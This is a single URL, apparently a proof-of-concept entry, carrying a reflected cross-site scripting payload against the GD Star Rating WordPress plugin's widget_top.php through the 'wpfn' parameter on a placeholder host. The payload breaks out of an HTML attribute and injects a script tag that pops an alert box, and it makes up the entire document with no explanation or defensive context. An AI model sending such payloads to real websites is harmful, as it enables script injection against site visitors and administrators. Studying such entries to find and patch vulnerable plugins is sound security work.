http://www.example.com/wp-content/plugins/gd-star-rating/widgets/widget_top.php?wpfn="><script>alert("XSS");</script>